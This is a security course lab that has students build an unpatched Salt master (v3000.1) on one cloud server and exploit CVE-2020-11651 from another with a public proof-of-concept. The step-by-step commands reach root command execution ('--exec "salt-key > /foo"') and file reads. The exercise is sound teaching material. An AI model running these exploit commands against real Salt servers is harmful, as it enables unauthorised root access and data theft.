W 401: Command Injection on Salt (15 pts extra)

What You Need

Purpose

To practice exploiting Salt, a popular server administration utility.

Create a Target Server

Create a new Debian 9 server on the Google Cloud, with the default settings, including a 10 GB disk.

Installing Salt

In an SSH session on your target server, execute these commands, one at a time, watching to see if any of them return errors: 
sudo apt update
sudo apt install git python-dev python-setuptools python-pip -y

sudo python -m pip install pyyaml
sudo python -m pip install tornado
sudo python -m pip install jinja2
sudo python -m pip install msgpack
sudo python -m pip install zmq

git clone git://github.com/saltstack/salt
cd salt
git tag
You see a list of available versions, as shown below.

Execute these commands, one at a time, watching to see if any of them return errors: 

git checkout v3000.1
sudo python setup.py install --force
It takes a few minutes to compile Salt. It should complete without errors.

Launching Salt

On your target server, execute these commands: 
sudo salt-master -d
sudo ss -pant
You should see "salt-master" listening on ports 4505 and 4506, as shown below.

Finding the Target IP Address

On your target server, execute this command: 
ip a
Find your target server's IP address, as shown below.

Preparing the Attack Server

Create another Debian 9 server on the Google Cloud, with the default settings, including a 10 GB disk.

Installing a PoC Exploit

In an SSH session on your attack server, execute these commands, one at a time, watching to see if any of them return errors: 
sudo apt update
sudo apt install git python3-pip -y
pip3 install salt

git clone https://github.com/jasperla/CVE-2020-11651-poc.git
cd CVE-2020-11651-poc/

Exploiting the Target Server

On your attack server, execute this command, adjusting the IP address to match the IP address of your target server. 
python3 exploit.py --master 10.128.0.12
The exploit should work, returning a long root key, as shown below.

Flag W 401.1: salt-key (15 pts)

On your attack server, execute these commands, adjusting the IP address to match the IP address of your target server. 
python3 exploit.py --master 10.128.0.12 --exec "salt-key > /foo"

python3 exploit.py --master 10.128.0.12 -r /foo
You see a list of key types. The flag is covered by a green rectangle in the image below.

References

PoC exploit for CVE-2020-11651 and CVE-2020-11652
https://www.digitalocean.com/community/tutorials/an-introduction-to-saltstack-terminology-and-concepts

Posted 5-6-2020
Updated to remove steps to fix exploit 8-1-2020
Flag 401.2 removed 3-22-2021